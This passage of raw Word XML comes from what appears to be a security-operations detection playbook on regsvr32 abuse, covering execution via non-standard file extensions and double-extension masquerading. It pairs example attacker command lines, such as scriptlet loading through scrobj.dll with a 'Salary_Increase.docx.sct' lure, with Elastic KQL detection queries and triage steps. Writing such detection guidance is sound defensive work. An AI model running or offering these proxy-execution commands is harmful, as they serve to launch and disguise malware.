    </w:p>
    <w:p w14:paraId="4E63E974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2.2.2 Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FFF3B6" w14:textId="5621BE24" w:rsidR="0071548A" w:rsidRPr="008E58E1" w:rsidRDefault="00F9115D" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Check</w:t>
      </w:r>
      <w:r w:rsidR="0071548A" w:rsidRPr="007B617B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0071548A" w:rsidRPr="006B3513">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">parent process/process tree </w:t>
      </w:r>
      <w:r w:rsidR="0071548A" w:rsidRPr="008D247B">
        <w:t>responsible for dropping the file</w:t>
      </w:r>
      <w:r w:rsidR="0071548A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDDE99D" w14:textId="4280EDA3" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00805916">
        <w:t xml:space="preserve">Inspect </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00805916">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00805916">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00805916">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>file signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B580B32" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00A90515" w:rsidRDefault="0071548A" w:rsidP="001918CA">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A90515">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2.3 True positive indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F846090" w14:textId="77777777" w:rsidR="001707F2" w:rsidRDefault="0071548A" w:rsidP="0071548A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Parent process not legit installer or spawned other process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F4A7BA" w14:textId="67386B13" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00805916">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">No </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00805916">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00805916">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D36B27" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C2962E" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00CF68B8" w:rsidRDefault="0071548A" w:rsidP="00CF68B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF68B8">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.3 Execution via Non-Standard Extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72082279" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:left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3D1F6BE7" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009B2E86" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2E86">
        <w:t>regsvr32.exe malicious.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797B3EC7" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009B2E86" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">regsvr32.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/s </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08244B89" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009B2E86" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">regsvr32.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/u </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>certificate.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73728854" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009B2E86" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">regsvr32.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/s /u </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>backup.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE4FC40" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009B2E86" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>regsvr32.exe script.vbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AADCEEE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2.3.1 Query KQL Elastic XDR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6817F0A9" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:trPr>
          <w:trHeight w:val="60"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E87CB2" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>process.name :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> regsvr32.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A047248" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t>AND NOT (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17A12826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*.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dll</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>* OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C8DF42D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*.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ocx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>* OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CDD28EF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*.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B781059" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7978646C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 xml:space="preserve">Query Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00AC4B3B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://portal.cybersoc.my/app/r/s/uVhAN</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1AB18C0E" w14:textId="4975F291" w:rsidR="0071548A" w:rsidRPr="001A19AB" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A19AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.3.2 Validation</w:t>
      </w:r>
      <w:r w:rsidR="00E3114F" w:rsidRPr="001A19AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> depends on information in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E3114F" w:rsidRPr="001A19AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>siem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23A17BD2" w14:textId="3A2D3805" w:rsidR="007003C8" w:rsidRDefault="0071548A" w:rsidP="007003C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A19AB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify the </w:t>
      </w:r>
      <w:r w:rsidRPr="001A19AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>file extension</w:t>
      </w:r>
      <w:r w:rsidRPr="001A19AB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="001A19AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MIME type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEA8B56" w14:textId="3680448D" w:rsidR="00A65DC2" w:rsidRDefault="007003C8" w:rsidP="000E09FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019527F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Check </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0019527F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0019527F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> load</w:t>
      </w:r>
      <w:r w:rsidR="009E10A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in library logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFC0CF9" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="001A19AB" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A19AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.3.3 True positive indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498AA0AC" w14:textId="705392D6" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A19AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>regsvr32 interacting with documents, scripts, or archives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284693EE" w14:textId="1662AB6C" w:rsidR="0071548A" w:rsidRDefault="001A45FF" w:rsidP="00BE3EEE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019527F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">No </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0019527F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0019527F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA4C0DB" w14:textId="77777777" w:rsidR="006B7553" w:rsidRDefault="006B7553" w:rsidP="00083843"/>
    <w:p w14:paraId="36A5EC5A" w14:textId="4C76F513" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="00CF68B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="002E4134">
        <w:t>Double Extension Masquerading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1668F8D6" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:left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541EEFCD" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="004A1287" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A1287">
        <w:t>regsvr32.exe C:\Downloads\Report.pdf.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E25EF1" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="002F4D84" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024509C">
        <w:t>regsvr32.exe /s /n /u /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0024509C">
        <w:t>i:Salary_Increase.docx.sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0024509C">
        <w:t xml:space="preserve"> scrobj.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24612ABB" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="004A1287" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A1287">
        <w:t>regsvr32.exe Archive.zip.</w:t>
      </w:r>
      <w:r>
        <w:t>ocx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0FFFB" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="004A1287" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="275914EE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2.4.1 Query KQL Elastic XDR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23FAC40B" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F84B2A6" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>process.name :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> regsvr32.exe AND</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C64905" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11EC1FEF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>*.pdf.*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A91C282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>*.doc.*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34DFAEEC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>*.docx.*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04466855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>*.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C1D3B21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>*.xlsx.*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="287227F2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>*.ppt.*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E734947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>*.jpg.*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67CF04E1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gramStart"/>
            <w:r>
              <w:t>*.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>png</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0BFB0EA6" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="396DA0CA" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t>AND</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DBE3ED9" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="467DE007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*.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dll</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>* OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6608342C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*.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sct</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>* OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63C66EB3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*.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ocx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>* OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E91A663" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t xml:space="preserve"> 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*.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cpl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44A90A3E" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="663F9377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 xml:space="preserve">Query Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00F01C92">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://portal.cyber</w:t>
        </w:r>
        <w:r w:rsidRPr="00F01C92">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>s</w:t>
        </w:r>
        <w:r w:rsidRPr="00F01C92">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>oc.my/app/r/s/fOjXc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30092249" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="000A2E44" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A2E44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.4.2 Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7963F15C" w14:textId="3E1F3CB6" w:rsidR="00FA21D4" w:rsidRPr="001A5277" w:rsidRDefault="0071548A" w:rsidP="001A5277">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A2E44">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect actual </w:t>
      </w:r>
      <w:r w:rsidRPr="000A2E44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>file type</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2E44">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r w:rsidRPr="000A2E44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>visible extension</w:t>
      </w:r>
      <w:r w:rsidR="000D477C" w:rsidRPr="000A2E44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8A6609" w14:textId="7D96CEB9" w:rsidR="00E14040" w:rsidRDefault="00E14040" w:rsidP="00FA21D4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Check file/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C3B63" w14:textId="3BF9544C" w:rsidR="009525E4" w:rsidRDefault="009525E4" w:rsidP="00FA21D4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Check </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A5277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A5277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> load</w:t>
      </w:r>
      <w:r w:rsidR="0028440D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in library logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE4D863" w14:textId="4D5AD0F3" w:rsidR="00FA21D4" w:rsidRPr="00FA21D4" w:rsidRDefault="00FA21D4" w:rsidP="004D34FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3349B28A" w14:textId="09A40756" w:rsidR="0071548A" w:rsidRPr="00FA21D4" w:rsidRDefault="0071548A" w:rsidP="00FA21D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
